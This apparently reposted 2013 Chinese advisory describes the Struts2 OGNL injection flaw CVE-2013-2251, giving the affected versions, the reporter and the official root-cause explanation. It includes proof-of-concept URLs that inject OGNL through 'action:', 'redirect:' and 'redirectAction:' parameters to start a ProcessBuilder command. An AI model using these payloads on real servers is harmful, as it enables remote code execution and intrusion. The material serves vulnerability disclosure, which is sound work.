Struts2再爆远程代码执行漏洞
2013-07-17 15:34
686 查看
Struts又爆远程代码执行漏洞!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。
描述
漏洞证明
参数会以OGNL表达式执行
描述
影响版本 Struts 2.0.0 - Struts 2.3.15 报告者 Takeshi Terada of Mitsui Bussan Secure Directions, Inc. CVE编号 CVE-2013-2251
漏洞证明
参数会以OGNL表达式执行
http://host/struts2-blank/example/X.action?action:%25{3*4} http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}[/code] 代码执行http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
漏洞原理
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
Apache官方地址
相关文章推荐
- Struts2 S2 – 032远程代码执行漏洞分析报告
- Struts2(s2-016)远程代码执行漏洞详细代码分析
- Struts2远程代码执行漏洞预警
- struts2之高危远程代码执行漏洞,可造成服务器被入侵,下载最新版本进行修复
- Struts2 S2-016,S2-017远程代码执行漏洞解决,修复
- Struts2 S2 – 032远程代码执行漏洞分析报告 .
- Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程
- Struts2再爆远程代码执行漏洞
- Struts2远程代码执行漏洞检测的原理和代码级实现
- Struts2 S2-029远程代码执行漏洞
- struts2之高危远程代码执行漏洞,可造成服务器被入侵,下载最新版本进行修复
- struts2-2.3.24.1升级Struts2-2.3.32避免远程代码执行漏洞
- Struts 2最新0day破坏性漏洞(远程任意代码执行)等的重现方法
- Tomcat漏洞之——通过PUT远程代码执行
- 利用最新struts2远程执行命令漏洞渗透网站的演示
- Android静态安全检测 -> WebView组件远程代码执行漏洞检测
- Apache Tomcat 信息泄露及远程代码执行漏洞分析与防护
- Bash 远程任意代码执行安全漏洞(最严重漏洞)
- Struts2/XWork < 2.2.0远程执行任意代码漏洞分析及修补[转自Neeao's Blog]
- 【S2-053】Struts2远程命令执行漏洞(CVE-2017-12611)